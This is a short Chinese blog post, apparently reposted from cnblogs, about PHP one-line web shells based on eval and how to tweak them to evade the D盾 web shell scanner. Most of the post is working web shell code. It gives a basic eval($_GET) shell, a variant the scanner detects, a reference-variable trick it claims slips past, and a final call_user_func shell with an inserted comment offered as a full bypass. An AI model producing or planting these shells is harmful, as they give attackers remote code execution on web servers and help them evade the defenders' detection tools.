首先我们知道,eval能执行php代码,最常见的php一句话也是用eval关键字的。
<?php @eval($_GET["code"])?>
在T00ls论坛混的时候,有一个现象,如果有人分享免杀一句话,里面用了 eval 这个关键字,很多人就会如图
很多表哥都这样说,主要还是因为eval这个函数,在人们心中是个危险函数,基本WAF看见秒杀那种,可事实真的是这样嘛??!
- 必被秒杀的一句话
<?php $a= $_REQUEST[1]; eval($a);
D盾 4级
- 我觉得还可以抢救的一句话
<?php $a = $_REQUEST[1]; eval($b=&$a); // 将变量$a的值引用给$b,所以在这里$a和$b是相等的。
轻松过D盾,来个图
- 注释一句话
这个回调函数的一句话,报了1级,如何完全过D盾呢
最后附上代码
<?php $a=call_user_func(function($u){return @$_REQUEST[$u];},‘1‘); eval(/**/($a));
原文:https://www.cnblogs.com/s0mf/p/9206764.html